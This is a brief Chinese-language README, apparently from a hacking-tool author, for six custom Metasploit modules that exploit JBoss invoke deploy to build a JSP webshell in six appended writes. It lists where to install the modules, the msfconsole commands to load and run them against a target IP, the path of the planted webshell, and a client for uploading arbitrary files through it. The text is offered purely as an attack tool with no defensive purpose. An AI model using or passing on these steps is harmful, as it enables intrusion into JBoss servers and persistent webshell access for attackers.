MSF jboss invoke deploy EXPLOIT moudlegit
Date:2013.11.28
Author:K8gegegithub
改這個EXP中 過程有點不進人意 沒能在一個payload裏直接輸出小馬
無奈只能分紅了6步來執行,長度有限制 只能一次寫入一段內容。
以追加方式寫入 最後才構造出 JSP 小馬...jsp
用法
BT5 MSF 下 JBOSS EXP存放路徑 把這幾個腳本丟到這裏來
/opt/metasploit/msf3/modules/exploit/multi/http/
msfconsole
use exploit/multi/http/jboss_invoke_deploy_K80
use exploit/multi/http/jboss_invoke_deploy_K81
use exploit/multi/http/jboss_invoke_deploy_K82
use exploit/multi/http/jboss_invoke_deploy_K83
use exploit/multi/http/jboss_invoke_deploy_K84
use exploit/multi/http/jboss_invoke_deploy_K85
set RHOST 172.16.126.134
exploit
成功後小馬路徑爲 www.xxoo.com/jboosjdk/inc.jsp
使用K8新型小馬客戶端鏈接 可上傳任意格式文件get